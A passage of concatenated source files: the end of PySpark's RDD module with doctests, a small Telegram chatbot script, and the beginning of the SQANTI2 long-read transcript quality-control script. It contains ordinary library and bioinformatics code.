>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k: int, it: Iterable[T]) -> Iterable[Tuple[T, int]]:
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self) -> Optional[str]:
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
return n if n else None
def setName(self: "RDD[T]", name: str) -> "RDD[T]":
"""
Assign a name to this RDD.
Examples
--------
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self) -> Optional[bytes]:
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
return debug_string.encode("utf-8") if debug_string else None
def getStorageLevel(self) -> StorageLevel:
"""
Get the RDD's current storage level.
Examples
--------
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(
java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication(),
)
return storage_level
def _defaultReducePartitions(self) -> int:
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self: "RDD[Tuple[K, V]]", key: K) -> List[V]:
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
Examples
--------
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self) -> "JavaObject":
"""Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pickle, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
assert self.ctx._jvm is not None
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout: int, confidence: float = 0.95) -> int:
"""
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
Examples
--------
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(
self: "RDD[Union[float, int]]", timeout: int, confidence: float = 0.95
) -> BoundedFloat:
"""
Approximate operation to return the sum within a timeout
or meet the confidence.
Examples
--------
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
assert self.ctx._jvm is not None
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(
self: "RDD[Union[float, int]]", timeout: int, confidence: float = 0.95
) -> BoundedFloat:
"""
Approximate operation to return the mean within a timeout
or meet the confidence.
Examples
--------
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
assert self.ctx._jvm is not None
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self: "RDD[T]", relativeSD: float = 0.05) -> int:
"""
Return approximate number of distinct elements in the RDD.
Parameters
----------
relativeSD : float, optional
Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
Notes
-----
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<https://doi.org/10.1145/2452376.2452456>`_.
Examples
--------
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self: "RDD[T]", prefetchPartitions: bool = False) -> Iterator[T]:
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
With prefetch it may consume up to the memory of the 2 largest partitions.
Parameters
----------
prefetchPartitions : bool, optional
If Spark should pre-fetch the next partition
before it is needed.
Examples
--------
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
assert self.ctx._jvm is not None
with SCCallSiteSync(self.context):
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(
self._jrdd.rdd(), prefetchPartitions
)
return _local_iterator_from_socket(sock_info, self._jrdd_deserializer)
def barrier(self: "RDD[T]") -> "RDDBarrier[T]":
"""
Marks the current stage as a barrier stage, where Spark must launch all tasks together.
In case of a task failure, instead of only restarting the failed task, Spark will abort the
entire stage and relaunch all tasks for this stage.
The barrier execution mode feature is experimental and it only handles limited scenarios.
Please read the linked SPIP and design docs to understand the limitations and future plans.
.. versionadded:: 2.4.0
Returns
-------
:class:`RDDBarrier`
instance that provides actions within a barrier stage.
See Also
--------
pyspark.BarrierTaskContext
Notes
-----
For additional information see
- `SPIP: Barrier Execution Mode <http://jira.apache.org/jira/browse/SPARK-24374>`_
- `Design Doc <https://jira.apache.org/jira/browse/SPARK-24582>`_
This API is experimental
"""
return RDDBarrier(self)
def _is_barrier(self) -> bool:
"""
Whether this RDD is in a barrier stage.
"""
return self._jrdd.rdd().isBarrier()
def withResources(self: "RDD[T]", profile: ResourceProfile) -> "RDD[T]":
"""
Specify a :class:`pyspark.resource.ResourceProfile` to use when calculating this RDD.
This is only supported on certain cluster managers and currently requires dynamic
allocation to be enabled. It will result in new executors with the resources specified
being acquired to calculate the RDD.
.. versionadded:: 3.1.0
Notes
-----
This API is experimental
"""
self.has_resource_profile = True
if profile._java_resource_profile is not None:
jrp = profile._java_resource_profile
else:
assert self.ctx._jvm is not None
builder = self.ctx._jvm.org.apache.spark.resource.ResourceProfileBuilder()
ereqs = ExecutorResourceRequests(self.ctx._jvm, profile._executor_resource_requests)
treqs = TaskResourceRequests(self.ctx._jvm, profile._task_resource_requests)
builder.require(ereqs._java_executor_resource_requests)
builder.require(treqs._java_task_resource_requests)
jrp = builder.build()
self._jrdd.withResources(jrp)
return self
def getResourceProfile(self) -> Optional[ResourceProfile]:
"""
Get the :class:`pyspark.resource.ResourceProfile` specified with this RDD or None
if it wasn't specified.
.. versionadded:: 3.1.0
Returns
-------
:py:class:`pyspark.resource.ResourceProfile`
The user specified profile or None if none were specified
Notes
-----
This API is experimental
"""
rp = self._jrdd.getResourceProfile()
if rp is not None:
return ResourceProfile(_java_resource_profile=rp)
else:
return None
@overload
def toDF(
self: "RDD[RowLike]",
schema: Optional[Union[List[str], Tuple[str, ...]]] = None,
sampleRatio: Optional[float] = None,
) -> "DataFrame":
...
@overload
def toDF(
self: "RDD[RowLike]", schema: Optional[Union["StructType", str]] = None
) -> "DataFrame":
...
@overload
def toDF(
self: "RDD[AtomicValue]",
schema: Union["AtomicType", str],
) -> "DataFrame":
...
def toDF(
self: "RDD[Any]", schema: Optional[Any] = None, sampleRatio: Optional[float] = None
) -> "DataFrame":
raise RuntimeError("""RDD.toDF was called before SparkSession was initialized.""")
def _prepare_for_python_RDD(sc: "SparkContext", command: Any) -> Tuple[bytes, Any, Any, Any]:
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
assert sc._jvm is not None
if len(pickled_command) > sc._jvm.PythonUtils.getBroadcastThreshold(sc._jsc): # Default 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(
sc: "SparkContext", func: Callable, deserializer: Any, serializer: Any, profiler: Any = None
) -> "JavaObject":
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
assert sc._jvm is not None
return sc._jvm.PythonFunction(
bytearray(pickled_command),
env,
includes,
sc.pythonExec,
sc.pythonVer,
broadcast_vars,
sc._javaAccumulator,
)
class RDDBarrier(Generic[T]):
"""
Wraps an RDD in a barrier stage, which forces Spark to launch tasks of this stage together.
:class:`RDDBarrier` instances are created by :func:`RDD.barrier`.
.. versionadded:: 2.4.0
Notes
-----
This API is experimental
"""
def __init__(self, rdd: RDD[T]):
self.rdd = rdd
def mapPartitions(
self, f: Callable[[Iterable[T]], Iterable[U]], preservesPartitioning: bool = False
) -> RDD[U]:
"""
Returns a new RDD by applying a function to each partition of the wrapped RDD,
where tasks are launched together in a barrier stage.
The interface is the same as :func:`RDD.mapPartitions`.
Please see the API doc there.
.. versionadded:: 2.4.0
Notes
-----
This API is experimental
"""
def func(s: int, iterator: Iterable[T]) -> Iterable[U]:
return f(iterator)
return PipelinedRDD(self.rdd, func, preservesPartitioning, isFromBarrier=True)
def mapPartitionsWithIndex(
self,
f: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
) -> RDD[U]:
"""
Returns a new RDD by applying a function to each partition of the wrapped RDD, while
tracking the index of the original partition. And all tasks are launched together
in a barrier stage.
The interface is the same as :func:`RDD.mapPartitionsWithIndex`.
Please see the API doc there.
.. versionadded:: 3.0.0
Notes
-----
This API is experimental
"""
return PipelinedRDD(self.rdd, f, preservesPartitioning, isFromBarrier=True)
class PipelinedRDD(RDD[U], Generic[T, U]):
"""
Examples
--------
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(
self,
prev: RDD[T],
func: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
isFromBarrier: bool = False,
):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func: Callable[[int, Iterable[V]], Iterable[T]] = prev.func
def pipeline_func(split: int, iterator: Iterable[V]) -> Iterable[U]:
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.has_resource_profile = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val: Optional["JavaObject"] = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
self.is_barrier = isFromBarrier or prev._is_barrier()
def getNumPartitions(self) -> int:
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self) -> "JavaObject":
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(
self.ctx, self.func, self._prev_jrdd_deserializer, self._jrdd_deserializer, profiler
)
assert self.ctx._jvm is not None
python_rdd = self.ctx._jvm.PythonRDD(
self._prev_jrdd.rdd(), wrapped_func, self.preservesPartitioning, self.is_barrier
)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
assert self._jrdd_val is not None
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self) -> int:
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self) -> bool:
return not (self.is_cached or self.is_checkpointed or self.has_resource_profile)
def _is_barrier(self) -> bool:
return self.is_barrier
def _test() -> None:
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs["sc"] = SparkContext("local[4]", "PythonTest")
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs["sc"].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
tg.py
|
import logging
import os
import queue
import threading
from telegram.ext import CommandHandler, Filters, MessageHandler, Updater
from client import chats, connect_ws, contexts
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG
)
BOT_TOKEN = os.environ["BOT_TOKEN"]
def start(update, context):
context.bot.send_message(
chat_id=update.effective_chat.id,
text=f"{update.effective_user.first_name}, just talk to me",
)
def talk(update, context):
incoming_message = update.message.text
chat_id = update.effective_chat.id
if chat_id not in chats:
chats[chat_id] = queue.Queue()
user = update.effective_user
username = f"{user.first_name} {user.last_name}"
threading.Thread(target=connect_ws, args=(chat_id, username)).start()
chats[chat_id].put(incoming_message)
contexts[chat_id] = context
def unknown(update, context):
context.bot.send_message(
chat_id=update.effective_chat.id,
text="sorry, I don't have any command. just talk to me",
)
if __name__ == "__main__":
updater = Updater(token=BOT_TOKEN, use_context=True)
dispatcher = updater.dispatcher
start_handler = CommandHandler("start", start)
message_handler = MessageHandler(Filters.text & (~Filters.command), talk)
unknown_handler = MessageHandler(Filters.command, unknown)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(message_handler)
dispatcher.add_handler(unknown_handler)
updater.start_polling()
|
sqanti_qc2.py
|
#!/usr/bin/env python
# SQANTI: Structural and Quality Annotation of Novel Transcript Isoforms
# Authors: Lorena de la Fuente, Hector del Risco, Cecile Pereira and Manuel Tardaguila
# Modified by Liz (etseng@pacb.com) currently as SQANTI2 working version
__author__ = "etseng@pacb.com"
__version__ = '7.3.2' # Python 3.7
import os, re, sys, subprocess, timeit, glob, copy
import shutil
import distutils.spawn
import itertools
import bisect
import argparse
import math
from collections import defaultdict, Counter, namedtuple
from csv import DictWriter, DictReader
from multiprocessing import Process
utilitiesPath = os.path.dirname(os.path.realpath(__file__))+"/utilities/"
sys.path.insert(0, utilitiesPath)
from rt_switching import rts
from indels_annot import calc_indels_from_sam
try:
from Bio.Seq import Seq
from Bio import SeqIO
from Bio.SeqRecord import SeqRecord
except ImportError:
print("Unable to import Biopython! Please make sure Biopython is installed.", file=sys.stderr)
sys.exit(-1)
try:
from bx.intervals import Interval, IntervalTree
except ImportError:
print("Unable to import bx-python! Please make sure bx-python is installed.", file=sys.stderr)
sys.exit(-1)
try:
from BCBio import GFF as BCBio_GFF
except ImportError:
print("Unable to import BCBio! Please make sure bcbiogff is installed.", file=sys.stderr)
sys.exit(-1)
try:
from err_correct_w_genome import err_correct
from sam_to_gff3 import convert_sam_to_gff3
from STAR import STARJunctionReader
from BED import LazyBEDPointReader
import coordinate_mapper as cordmap
except ImportError:
print("Unable to import err_correct_w_genome or sam_to_gff3.py! Please make sure cDNA_Cupcake/sequence/ is in $PYTHONPATH.", file=sys.stderr)
sys.exit(-1)
try:
from cupcake.tofu.compare_junctions import compare_junctions
from cupcake.tofu.filter_away_subset import read_count_file
from cupcake.io.BioReaders import GMAPSAMReader
from cupcake.io.GFF import collapseGFFReader, write_collapseGFF_format
except ImportError:
print("Unable to import cupcake.tofu! Please make sure you install cupcake.", file=sys.stderr)
sys.exit(-1)
# check cupcake version
import cupcake
v1, v2 = [int(x) for x in cupcake.__version__.split('.')]
if v1 < 8 or v2 < 6:
print("Cupcake version must be 8.6 or higher! Got {0} instead.".format(cupcake.__version__), file=sys.stderr)
sys.exit(-1)
GMAP_CMD = "gmap --cross-species -n 1 --max-intronlength-middle=2000000 --max-intronlength-ends=2000000 -L 3000000 -f samse -t {cpus} -D {dir} -d {name} -z {sense} {i} > {o}"
#MINIMAP2_CMD = "minimap2 -ax splice --secondary=no -C5 -O6,24 -B4 -u{sense} -t {cpus} {g} {i} > {o}"
MINIMAP2_CMD = "minimap2 -ax splice --secondary=no -C5 -u{sense} -t {cpus} {g} {i} > {o}"
DESALT_CMD = "deSALT aln {dir} {i} -t {cpus} -x ccs -o {o}"
GMSP_PROG = os.path.join(utilitiesPath, "gmst", "gmst.pl")
GMST_CMD = "perl " + GMSP_PROG + " -faa --strand direct --fnn --output {o} {i}"
GTF2GENEPRED_PROG = "gtfToGenePred"
GFFREAD_PROG = "gffread"
if distutils.spawn.find_executable(GTF2GENEPRED_PROG) is None:
print("Cannot find executable {0}. Abort!".format(GTF2GENEPRED_PROG), file=sys.stderr)
sys.exit(-1)
if distutils.spawn.find_executable(GFFREAD_PROG) is None:
print("Cannot find executable {0}. Abort!".format(GFFREAD_PROG), file=sys.stderr)
sys.exit(-1)
seqid_rex1 = re.compile('PB\.(\d+)\.(\d+)$')
seqid_rex2 = re.compile('PB\.(\d+)\.(\d+)\|\S+')
seqid_fusion = re.compile("PBfusion\.(\d+)")
FIELDS_JUNC = ['isoform', 'chrom', 'strand', 'junction_number', 'genomic_start_coord',
'genomic_end_coord', 'transcript_coord', 'junction_category',
'start_site_category', 'end_site_category', 'diff_to_Ref_start_site',
'diff_to_Ref_end_site', 'bite_junction', 'splice_site', 'canonical',
'RTS_junction', 'indel_near_junct',
'phyloP_start', 'phyloP_end', 'sample_with_cov', "total_coverage"] #+coverage_header
FIELDS_CLASS = ['isoform', 'chrom', 'strand', 'length', 'exons', 'structural_category',
'associated_gene', 'associated_transcript', 'ref_length', 'ref_exons',
'diff_to_TSS', 'diff_to_TTS', 'diff_to_gene_TSS', 'diff_to_gene_TTS',
'subcategory', 'RTS_stage', 'all_canonical',
'min_sample_cov', 'min_cov', 'min_cov_pos', 'sd_cov', 'FL', 'n_indels',
'n_indels_junc', 'bite', 'iso_exp', 'gene_exp', 'ratio_exp',
'FSM_class', 'coding', 'ORF_length', 'CDS_length', 'CDS_start',
'CDS_end', 'CDS_genomic_start', 'CDS_genomic_end', 'predicted_NMD',
'perc_A_downstream_TTS', 'seq_A_downstream_TTS',
'dist_to_cage_peak', 'within_cage_peak',
'dist_to_polya_site', 'within_polya_site',
'polyA_motif', 'polyA_dist']
RSCRIPTPATH = distutils.spawn.find_executable('Rscript')
RSCRIPT_REPORT = 'SQANTI_report2.R'
if os.system(RSCRIPTPATH + " --version")!=0:
print("Rscript executable not found! Abort!", file=sys.stderr)
sys.exit(-1)
SPLIT_ROOT_DIR = 'splits/'
class genePredReader(object):
def __init__(self, filename):
self.f = open(filename)
def __iter__(self):
return self
def __next__(self):
line = self.f.readline().strip()
if len(line) == 0:
raise StopIteration
return genePredRecord.from_line(line)
class genePredRecord(object):
def __init__(self, id, chrom, strand, txStart, txEnd, cdsStart, cdsEnd, exonCount, exonStarts, exonEnds, gene=None):
self.id = id
self.chrom = chrom
self.strand = strand
self.txStart = txStart # 1-based start
self.txEnd = txEnd # 1-based end
self.cdsStart = cdsStart # 1-based start
self.cdsEnd = cdsEnd # 1-based end
self.exonCount = exonCount
self.exonStarts = exonStarts # 0-based starts
self.exonEnds = exonEnds # 1-based ends
self.gene = gene
self.length = 0
self.exons = []
for s,e in zip(exonStarts, exonEnds):
self.length += e-s
self.exons.append(Interval(s, e))
# junctions are stored (1-based last base of prev exon, 1-based first base of next exon)
self.junctions = [(self.exonEnds[i],self.exonStarts[i+1]) for i in range(self.exonCount-1)]
@property
def segments(self):
return self.exons
@classmethod
def from_line(cls, line):
raw = line.strip().split('\t')
return cls(id=raw[0],
chrom=raw[1],
strand=raw[2],
txStart=int(raw[3]),
txEnd=int(raw[4]),
cdsStart=int(raw[5]),
cdsEnd=int(raw[6]),
exonCount=int(raw[7]),
exonStarts=[int(x) for x in raw[8][:-1].split(',')], #exonStarts string has extra , at end
exonEnds=[int(x) for x in raw[9][:-1].split(',')], #exonEnds string has extra , at end
gene=raw[11] if len(raw)>=12 else None,
)
def get_splice_site(self, genome_dict, i):
"""
Return the donor-acceptor site (ex: GTAG) for the i-th junction
:param i: 0-based junction index
:param genome_dict: dict of chrom --> SeqRecord
:return: splice site pattern, ex: "GTAG", "GCAG" etc
"""
assert 0 <= i < self.exonCount-1
d = self.exonEnds[i]
a = self.exonStarts[i+1]
seq_d = genome_dict[self.chrom].seq[d:d+2]
seq_a = genome_dict[self.chrom].seq[a-2:a]
if self.strand == '+':
return (str(seq_d)+str(seq_a)).upper()
else:
return (str(seq_a.reverse_complement())+str(seq_d.reverse_complement())).upper()
class myQueryTranscripts:
def __init__(self, id, tss_diff, tts_diff, num_exons, length, str_class, subtype=None,
genes=None, transcripts=None, chrom=None, strand=None, bite ="NA",
RT_switching ="????", canonical="NA", min_cov ="NA",
min_cov_pos ="NA", min_samp_cov="NA", sd ="NA", FL ="NA", FL_dict={},
nIndels ="NA", nIndelsJunc ="NA", proteinID=None,
ORFlen="NA", CDS_start="NA", CDS_end="NA",
CDS_genomic_start="NA", CDS_genomic_end="NA", is_NMD="NA",
isoExp ="NA", geneExp ="NA", coding ="non_coding",
refLen ="NA", refExons ="NA",
refStart = "NA", refEnd = "NA",
q_splicesite_hit = 0,
q_exon_overlap = 0,
FSM_class = None, percAdownTTS = None, seqAdownTTS=None,
dist_cage='NA', within_cage='NA',
dist_polya_site='NA', within_polya_site='NA',
polyA_motif='NA', polyA_dist='NA'):
self.id = id
self.tss_diff = tss_diff # distance to TSS of best matching ref
self.tts_diff = tts_diff # distance to TTS of best matching ref
self.tss_gene_diff = 'NA' # min distance to TSS of all genes matching the ref
self.tts_gene_diff = 'NA' # min distance to TTS of all genes matching the ref
self.genes = genes if genes is not None else []
self.AS_genes = set() # ref genes that are hit on the opposite strand
self.transcripts = transcripts if transcripts is not None else []
self.num_exons = num_exons
self.length = length
self.str_class = str_class # structural classification of the isoform
self.chrom = chrom
self.strand = strand
self.subtype = subtype
self.RT_switching= RT_switching
self.canonical = canonical
self.min_samp_cov = min_samp_cov
self.min_cov = min_cov
self.min_cov_pos = min_cov_pos
self.sd = sd
self.proteinID = proteinID
self.ORFlen = ORFlen
self.CDS_start = CDS_start
self.CDS_end = CDS_end
self.coding = coding
self.CDS_genomic_start = CDS_genomic_start # 1-based genomic coordinate of CDS start - strand aware
self.CDS_genomic_end = CDS_genomic_end # 1-based genomic coordinate of CDS end - strand aware
self.is_NMD = is_NMD # (TRUE,FALSE) for NMD if is coding, otherwise "NA"
self.FL = FL # count for a single sample
self.FL_dict = FL_dict # dict of sample -> FL count
self.nIndels = nIndels
self.nIndelsJunc = nIndelsJunc
self.isoExp = isoExp
self.geneExp = geneExp
self.refLen = refLen
self.refExons = refExons
self.refStart = refStart
self.refEnd = refEnd
self.q_splicesite_hit = q_splicesite_hit
self.q_exon_overlap = q_exon_overlap
self.FSM_class = FSM_class
self.bite = bite
self.percAdownTTS = percAdownTTS
self.seqAdownTTS = seqAdownTTS
self.dist_cage = dist_cage
self.within_cage = within_cage
self.within_polya_site = within_polya_site
self.dist_polya_site = dist_polya_site # distance to the closest polyA site (--polyA_peak, BEF file)
self.polyA_motif = polyA_motif
self.polyA_dist = polyA_dist # distance to the closest polyA motif (--polyA_motif_list, 6mer motif list)
def get_total_diff(self):
return abs(self.tss_diff)+abs(self.tts_diff)
def modify(self, ref_transcript, ref_gene, tss_diff, tts_diff, refLen, refExons):
self.transcripts = [ref_transcript]
self.genes = [ref_gene]
self.tss_diff = tss_diff
self.tts_diff = tts_diff
self.refLen = refLen
self.refExons = refExons
def geneName(self):
geneName = "_".join(set(self.genes))
return geneName
def ratioExp(self):
if self.geneExp == 0 or self.geneExp == "NA":
return "NA"
else:
ratio = float(self.isoExp)/float(self.geneExp)
return(ratio)
def CDSlen(self):
if self.coding == "coding":
return(str(int(self.CDS_end) - int(self.CDS_start) + 1))
else:
return("NA")
def __str__(self):
return "%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s" % (self.chrom, self.strand,
str(self.length), str(self.num_exons),
str(self.str_class), "_".join(set(self.genes)),
self.id, str(self.refLen), str(self.refExons),
str(self.tss_diff), str(self.tts_diff),
self.subtype, self.RT_switching,
self.canonical, str(self.min_samp_cov),
str(self.min_cov), str(self.min_cov_pos),
str(self.sd), str(self.FL), str(self.nIndels),
str(self.nIndelsJunc), self.bite, str(self.isoExp),
str(self.geneExp), str(self.ratioExp()),
self.FSM_class, self.coding, str(self.ORFlen),
str(self.CDSlen()), str(self.CDS_start), str(self.CDS_end),
str(self.CDS_genomic_start), str(self.CDS_genomic_end), str(self.is_NMD),
str(self.percAdownTTS),
str(self.seqAdownTTS),
str(self.dist_cage),
str(self.within_cage),
str(self.dist_polya_site),
str(self.within_polya_site),
str(self.polyA_motif),
str(self.polyA_dist))
def as_dict(self):
d = {'isoform': self.id,
'chrom': self.chrom,
'strand': self.strand,
'length': self.length,
'exons': self.num_exons,
'structural_category': self.str_class,
'associated_gene': "_".join(set(self.genes)),
'associated_transcript': "_".join(set(self.transcripts)),
'ref_length': self.refLen,
'ref_exons': self.refExons,
'diff_to_TSS': self.tss_diff,
'diff_to_TTS': self.tts_diff,
'diff_to_gene_TSS': self.tss_gene_diff,
'diff_to_gene_TTS': self.tts_gene_diff,
'subcategory': self.subtype,
'RTS_stage': self.RT_switching,
'all_canonical': self.canonical,
'min_sample_cov': self.min_samp_cov,
'min_cov': self.min_cov,
'min_cov_pos': self.min_cov_pos,
'sd_cov': self.sd,
'FL': self.FL,
'n_indels': self.nIndels,
'n_indels_junc': self.nIndelsJunc,
'bite': self.bite,
'iso_exp': self.isoExp,
'gene_exp': self.geneExp,
'ratio_exp': self.ratioExp(),
'FSM_class': self.FSM_class,
'coding': self.coding,
'ORF_length': self.ORFlen,
'CDS_length': self.CDSlen(),
'CDS_start': self.CDS_start,
'CDS_end': self.CDS_end,
'CDS_genomic_start': self.CDS_genomic_start,
'CDS_genomic_end': self.CDS_genomic_end,
'predicted_NMD': self.is_NMD,
'perc_A_downstream_TTS': self.percAdownTTS,
'seq_A_downstream_TTS': self.seqAdownTTS,
'dist_to_cage_peak': self.dist_cage,
'within_cage_peak': self.within_cage,
'dist_to_polya_site': self.dist_polya_site,
'within_polya_site': self.within_polya_site,
'polyA_motif': self.polyA_motif,
'polyA_dist': self.polyA_dist
}
for sample,count in self.FL_dict.items():
d["FL."+sample] = count
return d
class myQueryProteins:
def __init__(self, cds_start, cds_end, orf_length, proteinID="NA"):
self.orf_length = orf_length
self.cds_start = cds_start # 1-based start on transcript
self.cds_end = cds_end # 1-based end on transcript (stop codon), ORF is seq[cds_start-1:cds_end].translate()
self.cds_genomic_start = None # 1-based genomic start of ORF, if - strand, is greater than end
self.cds_genomic_end = None # 1-based genomic end of ORF
self.proteinID = proteinID
def rewrite_sam_for_fusion_ids(sam_filename):
seen_id_counter = Counter()
f = open(sam_filename+'.tmp', 'w')
for line in open(sam_filename):
if line.startswith('@'):
f.write(line)
else:
raw = line.strip().split('\t')
if not raw[0].startswith('PBfusion.'):
print("Expecting fusion ID format `PBfusion.X` but saw {0} instead. Abort!".format(raw[0]), file=sys.stderr)
sys.exit(-1)
seen_id_counter[raw[0]] += 1
raw[0] = raw[0] + '.' + str(seen_id_counter[raw[0]])
f.write("\t".join(raw) + '\n')
f.close()
os.rename(f.name, sam_filename)
return sam_filename
def write_collapsed_GFF_with_CDS(isoforms_info, input_gff, output_gff):
"""
Augment a collapsed GFF with CDS information
*NEW* Also, change the "gene_id" field to use the classification result
:param isoforms_info: dict of id -> QueryTranscript
:param input_gff: input GFF filename
:param output_gff: output GFF filename
"""
with open(output_gff, 'w') as f:
reader = collapseGFFReader(input_gff)
for r in reader:
r.geneid = isoforms_info[r.seqid].geneName() # set the gene name
s = isoforms_info[r.seqid].CDS_genomic_start # could be 'NA'
e = isoforms_info[r.seqid].CDS_genomic_end # could be 'NA'
